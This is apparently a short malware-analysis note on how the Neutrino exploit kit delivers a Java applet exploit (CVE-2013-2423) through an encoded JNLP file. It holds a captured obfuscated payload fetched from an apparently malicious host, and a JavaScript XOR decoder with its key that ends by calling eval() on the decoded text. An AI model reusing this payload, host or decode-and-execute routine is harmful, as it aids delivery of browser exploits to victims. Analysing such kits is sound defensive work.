Trusted Applet

Neutrino jnlp for : http://malware.dontneedcoffee.com/2013/04/cve-2013-2423-integrating-exploit-kits.html --- Encoded JNLP -- POST http://evaluation-man.net/cvwrssa 200 OK (text/html) ---- Raw Content --- %5D%1B%09%09%1F%04%0EY%1A%1C%05%1FD%5E2%03%19%5EY%04%08%1E%0D%11NFK%5EY%1B%04%13%1E%11%07%5C%5DH%5EMksppzhF%09%18%01%00%17Y%17%12%0C%1FD%5E%16%19%1F%1A%5ES%17%1B%15%0C%16%5C%5D%181%21Q%19%3D%16%05-H%2FK%2A6%02H%20%2B3%0A%1BKG%15%18.%3F%06-%17L%15%17%22C%0E%1D%2B%3B%0D%231%1B%0B%20%14%2B%40%03%14%2B%13%11%1BC%16%1D4%0D%14%1A%3E%29%08%181%11F%04%3EIH%3E5%1E%10%20%27%20%004%3E5%09%23-3%198%00%1EH%3D%0B%3F%0E4%09%2B%10%20%03%26%5C%5DGszhsppO%11%1B%0B%18%1EA%14%18%14%16%5C%5D%01%12%16%18%5DY%0F%12%0D%0F%1CDT%17%02%16%09%0B%05%19%15%01%19%17%5DGszhsppO%11%1B%0B%18%1EA%14%18%14%16%5C%5D%13%17%1F%11%25%11%0B%16%07%5DY%0F%12%0D%0F%1CDT%20%18%1AW%19%0F%16%09%5EMksppzhF%09%18%01%00%17Y%17%12%0C%1FD%5E%19%0F%16%09%26%16%0C%18%1C%1D%17%04%1E%5EY%05%00%16%0C%1CNF%2A%3D%40G%03-%0E%1E%17%0C%2C%00%1AA%0D%0C%1B%13C%087%2AM%04%28%13%3B%15%11%0C4%0F%234%0D%0F%23%03C%08%1E%21%2B%1E-.%1E%10%23%1BN2%3A%22%0A0%3A-%0B%10%18%14%01%04%28%3D%11%00%296%23%400%18%27%13%20%00F%10%18%14%01%04%28%13%3B%03%10%26%2C%13%29%20%28%025%132%0831%11%07%03%3DL%03%3C%0C%0A%14%1C7Q%13%181%21Q%19%3D%16%05-H%09%11%17%0C%3C%14%1C0T%10%1BKC%08%2A%1E%169%22%2B%12305%02%09%1B%1E%3B%0C%1A%14B%09%1E%3E%15%05%03%10M200%113%3A%22%0A0%291%21%11%1E%3E%01%1F1%16%2B%00%1794I%23%240%1D%28%211%16%18%3E%2FC19%40I%129%28%0A%23%27U1%3A%28%18%2B9%28%12912%23%15%11%0C%28%0F%1A%19T1%20%21%29%09%2A%3A%40A%3B-L%12%11R3R%3A%14%0A0%3A%28%18%2B%2A%3A%40%03%03%17%23%0F%10%0CK%11%1D4%0D%0C%1B%13G%2A9%28%129%22%2B%12A%10%0C%2C%03%1B%407%03%20K%25%1B%2A%1E%169%22%2B%12300%11A%18%19%2B%00%23%2A1%0E%19%14%2F%1E1%293%16%17%29%28%0E6%1AY%0C%18%145S%23%2AL%09%05-M%0C%2ASC%0D5%40%23%03%1BK%21P%23J%2B%09-H%3FH%17%26C%12%1B0X%0B4%17%3D%0D3%10%3BA%3B%223%03%126C%0C%29%20%28%025%13%10%133%108%051%1D%16300%113%3A%22%0AB%18%145%183%3E%11%0A%3B-%20%40%3A%0C%12I%1D%3B%20L5%00J%0D%1E%14%3F%00%05-%3FI%126C%0C5%24P%12%1B%10F%14%20%21%28%05%3B%22%3FI%119%19V%18%3B%3BH%1AJ%1B%12%1F.%2F%1A%3B%3D%0D%08%235%2F%017A%2B%124%3D%3E%16%23.%3F%1B%2C%177%13%3C%25%2FK4%27%20%004%14%3D%0B4%2A0%14%03-%3F%09%11%0BJ%10%1D%3B%2BK%23%2A%3A%066%03M8%22%2B%12300%11A5%40%2B%16%1AKJP%19%147%1F%02%00M200%113%3A%22%0AB%20%211%16%18%3E%2FC--%2B%15%10S7%1E%1B%24%27%0A%1B%10B%0B%18%3E%3F%09%02%00I%10%2260%130%1A%23%0F%20.B%0D%2A%2A3%26%02%14%2F%03%17%26%2C%1206%27%0D%1A%3E%0B%0D%1E%3A0%14%05H%15%12%17%26%1D%400%19%24%130%3E%1B%0D%1B.%1D%1C%05%3EI%10%3E23R%3A%14%0A0%3A%28%18%2B9-%01%048%223%11%1128%0C%20%24P%16%29%2A9%07%22K%3F%04%02%3D%01%15%17%27C%03%1A%40%3B%1C%1D%145%12%1B.%2B%1B%05%3D%2F%12%3A%088K%20%24%19K%23-C%08%1E13B%3B%290%1E%3F%1BN2%3A%22%0A0%3A%28%18Y6K%3F%04%02%3D%01%15%17%22K%12%23%2B%2F%10%29%1E%1C%2B9%28%12919%40%08%11%0C%02%0E%29%14%5CG%5EGyhsppON%1B%09%09%1F%04%0EG ---- To decode this, everything is in the landing ---- pass= "azyys"; // cf landing input = decodeURIComponent(input); //where input is the encoded JNLP and applying //We use the "xor" function var output = ""; var i = 0; var pos = 0; for (i = 0; i < input.length; i++){ pos = Math.floor(i%pass.length); output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos)); } eval( output); ----OutPut is --- ---- Base 64 decode -- Trusted Applet Java

------